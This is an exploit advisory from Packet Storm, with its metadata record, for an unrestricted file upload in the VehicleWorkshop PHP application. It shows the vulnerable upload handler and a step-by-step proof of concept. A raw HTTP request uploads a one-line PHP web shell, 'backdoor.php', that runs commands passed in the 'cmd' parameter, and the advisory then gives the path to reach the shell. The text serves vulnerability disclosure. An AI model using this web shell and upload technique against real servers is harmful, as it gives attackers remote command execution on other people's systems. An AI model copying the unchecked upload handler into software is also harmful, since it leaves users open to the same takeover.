ID PACKETSTORM:143618
Type packetstorm
Reporter Touhid M.Shaikh
Modified 2017-08-01T00:00:00
Description
`# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload
# Exploit Author: Touhid M.Shaikh
# Date: 1/08/2017
# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
# Tested on : Kali Linux 2.0 64 bit and Windows 7
===================
Vulnerable Page:
===================
http://192.168.1.13/sellvehicle.php
====================
Vulnerable Source:
====================
--------------------------------PHP code-----------
<?php
if(isset($_POST["submit"]))
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/" . $_FILES["file"]["name"]);
--------------------------------------------------
-----------------------HTML Form -----------------
<label for="images"></label>
<label for="file"></label>
<input type="file" name="file" id="file" /><input type="hidden"
name="image" />
-----------------------------------------------------------------------
You can upload a shell or any other file via a regular or customer user account, because the handler above writes the client-supplied filename straight into the web-accessible upload/ directory without checking its extension or content.
================= POC ======================
We need to log in to any customer account, or create an account
(http://192.168.1.13/registration.php) and log in.
After the customer panel opens, navigate to
http://192.168.1.13/sellvehicle.php
, fill in the form data and upload your unrestricted file.
--------------------------Request---------------------------
POST /sellvehicle.php HTTP/1.1
Host: 192.168.1.13
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------144421253520516158491092952973
Content-Length: 1085
Referer: http://192.168.1.13/sellvehicle.php
Cookie: PHPSESSID=ccopsj443v8d2kksu0u40cte10
Connection: close
Upgrade-Insecure-Requests: 1
.
.
.
.skip
Content-Disposition: form-data; name="file"; filename="backdoor.php"
Content-Type: application/x-php
<?php system($_GET['cmd']); ?>
.
.
.
.skip
------------------------------------------------------------------------------
--------------------------Response --------------------------
HTTP/1.1 200 OK
Date: Mon, 31 Jul 2017 20:38:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l
mod_autoindex_color PHP/5.3.1
X-Powered-By: PHP/5.3.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 2909
Connection: close
Content-Type: text/html
------------------------------------------------------------------------------
====================================================================
Now you can access your shell or file at /upload/backdoor.php
http://192.168.1.13/upload/backdoor.php
Enjoy !
Regards.
Touhid Shaikh
`
{"id": "PACKETSTORM:143618", "type": "packetstorm", "bulletinFamily": "exploit", "title": "VehicleWorkshop Arbitrary File Upload", "description": "", "published": "2017-08-01T00:00:00", "modified": "2017-08-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/143618/VehicleWorkshop-Arbitrary-File-Upload.html", "reporter": "Touhid M.Shaikh", "references": [], "cvelist": [], "lastseen": "2017-08-02T14:47:22", "viewCount": 1, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-08-02T14:47:22", "rev": 2}, "dependencies": {"references": [], "modified": "2017-08-02T14:47:22", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/143618/vehicleworkshop-upload.txt", "sourceData": "`# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload \n# Exploit Author: Touhid M.Shaikh \n# Date: 1/08/2017 \n# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop \n# Tested on : Kali Linux 2.0 64 bit and Windows 7 \n \n \n \n=================== \nVulnerable Page: \n=================== \n \nhttp://192.168.1.13/sellvehicle.php \n \n==================== \nVulnerable Source: \n==================== \n \n \n--------------------------------PHP code----------- \n<?php \nif(isset($_POST[\"submit\"])) \n{ \nmove_uploaded_file($_FILES[\"file\"][\"tmp_name\"], \n\"upload/\" . $_FILES[\"file\"][\"name\"]); \n \n \n-------------------------------------------------- \n \n-----------------------HTML Form ----------------- \n<label for=\"images\"></label> \n<label for=\"file\"></label> \n<input type=\"file\" name=\"file\" id=\"file\" /><input type=\"hidden\" \nname=\"image\" /> \n \n----------------------------------------------------------------------- \n \nU can upload Shell or File via Regular or customer User Account. 
\n \n================= POC ====================== \n \nWe need to login any customer account or create an account ( \nhttp://192.168.1.13/registration.php) and login. \n \nAfter customer panel open Navigate to \nhttp://192.168.1.13/sellvehicle.php \n \nand feed data and upload you unrestricted file. \n \n--------------------------Request--------------------------- \n \nPOST /sellvehicle.php HTTP/1.1 \nHost: 192.168.1.13 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101 \nFirefox/54.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3 \nContent-Type: multipart/form-data; \nboundary=---------------------------144421253520516158491092952973 \nContent-Length: 1085 \nReferer: http://192.168.1.13/sellvehicle.php \nCookie: PHPSESSID=ccopsj443v8d2kksu0u40cte10 \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \n. \n. \n. \n.skip \n \nContent-Disposition: form-data; name=\"file\"; filename=\"backdoor.php\" \nContent-Type: application/x-php \n \n<?php system($_GET['cmd']); ?> \n \n. \n. \n. \n.skip \n------------------------------------------------------------------------------ \n \n--------------------------Rsponse -------------------------- \nHTTP/1.1 200 OK \nDate: Mon, 31 Jul 2017 20:38:09 GMT \nServer: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l \nmod_autoindex_color PHP/5.3.1 \nX-Powered-By: PHP/5.3.1 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, \npre-check=0 \nPragma: no-cache \nContent-Length: 2909 \nConnection: close \nContent-Type: text/html \n------------------------------------------------------------------------------ \n \n \n==================================================================== \n \nNow You Can Access you Shell or File in /upload/backdoor.php \n \nhttp://192.168.1.13/upload/backdoor.php \n \n \nEnjoy ! \n \nRegards. \nTouhid Shaikh \n \n`\n"}
{}